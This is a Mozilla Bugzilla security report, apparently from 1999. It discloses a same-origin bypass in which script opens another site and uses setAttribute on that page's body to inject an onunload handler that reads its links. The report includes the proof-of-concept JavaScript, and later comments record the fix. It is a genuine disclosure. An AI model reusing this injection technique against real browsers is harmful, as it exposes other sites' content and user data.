Closed
Bug 15757
Opened 25 years ago
Closed 25 years ago
[DOGFOOD] Injecting JS code using setAttribute and getElementsByTagName
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M12
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
(Whiteboard: [PDT+])
It is possible to include JavaScript code in any HTML page using setAttribute and getElementsByTagName. This exposes the whole DOM of the target document, including content, input fields, links, etc. I use the "onunload" body event, but probably there are others ways. The code is: -------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com"); setTimeout("r=a.document.getElementsByTagName('BODY')[0];r.setAttribute('onunloa d','s=\"Here are some links: \"; for(i=0;i< ( (document.links.length < 10) ? document.links.length : 10) ;i++) s += document.links[i].href +String.fromCharCode(10);alert(s)')",10000); </SCRIPT> --------------------------------------
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Assignee | ||
Updated•25 years ago
|
Target Milestone: M12
Assignee | ||
Updated•25 years ago
|
Summary: Injecting JS code using setAttribute and getElementsByTagName → [Dogfood] Injecting JS code using setAttribute and getElementsByTagName
Assignee | ||
Comment 1•25 years ago
|
||
Marking dogfood for analysis by PDT at jar's request.
Assignee | ||
Updated•25 years ago
|
Summary: [Dogfood] Injecting JS code using setAttribute and getElementsByTagName → [DOGFOOD] Injecting JS code using setAttribute and getElementsByTagName
Assignee | ||
Comment 2•25 years ago
|
||
Very ingenious. I think setAttribute should be subject to the same origin policy check.
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Windows NT (1999112908) Com: Javascript Error: uncaught exception: [Exception... "Security error" code: "1000" nsresult: "0x805303e8 (NS_ERROR_DOM_SECURITY_ERR)" location: "http://www.nat.bg/~joro/mozilla/createel.html Line: 16"]
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Comment hidden (collapsed) |
You need to log in
before you can comment on or make changes to this bug.
Description
•